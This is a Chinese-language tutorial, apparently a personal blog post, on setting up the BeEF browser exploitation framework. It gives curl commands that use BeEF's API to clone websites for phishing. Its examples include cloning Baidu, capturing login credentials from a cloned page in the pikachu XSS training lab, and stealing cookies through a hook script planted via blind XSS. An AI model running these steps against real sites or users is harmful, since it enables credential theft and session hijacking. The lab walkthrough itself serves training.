BeEF(Browser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit(MSF)进行渗透。基于Ruby语言编写,并且支持图形化界面,操作简单。
一、配置BeEF
# 安装beef
sudo apt install beef-xss
# 配置文件
/usr/share/beef-xss/config.yaml
将本地IP地址设置为监听地址
ifconfig查看本机地址
修改配置文件
# 启动beef 账号beef密码beef
cd /usr/share/beef-xss
./beef
启动成功!
Hook URL:控制用户请求js文件
UI URL:beef控制台
RESTful API key:beef启动需要的字符串
二、使用beef克隆其他网站
(1)使用 beef 克隆其他网站
curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"<URL of site to clone>", "mount":"<where to mount>"}' -X POST http://<BeEFURL>/api/seng/clone_page?token=<token>
// <URL of site to clone> 需要克隆的网址
// <where to mount> 克隆的页面在服务器的哪个路径访问
// <token> 服务启动时的 beef API key
# 克隆
curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https://www.baidu.com", "mount":"/clone_site_baidu"}' -X POST http://192.168.0.186:3000/api/seng/clone_page?token=acb2099fa6d344c003668100735dd88e76a507f2
如图所示,克隆成功!
不知道为啥图片没加载成功
(2)使用 beef 克隆 pikachu 平台的”反射型XSS(post)“的登录页面获取账号密码
访问 http://kali_ip:3000/pikachu_magedu ,可以看到beef中有机器上线,在页面中进行登录
curl -H "Content-Type: application/json; charset=UTF-8" -d
'{"url":"http://pikachu_ip/vul/xss/xsspost/post_login.php","mount":"/pikachu_mag
edu"}' -X POST http://kali_ip:3000/api/seng/clone_page?token=XX
可以在beef的 logs 模块中查看到提交的 form 表单信息
(3)使用 beef 攻击 pikachu 平台的”XSS之盲打“页面获取cookie
在”XSS之盲打“中上传hook脚本,让用户触发XSS
选择 Current Browser -> Commands -> Get Cookie 并点击 Execute 获取 cookie
验证cookie值是否正确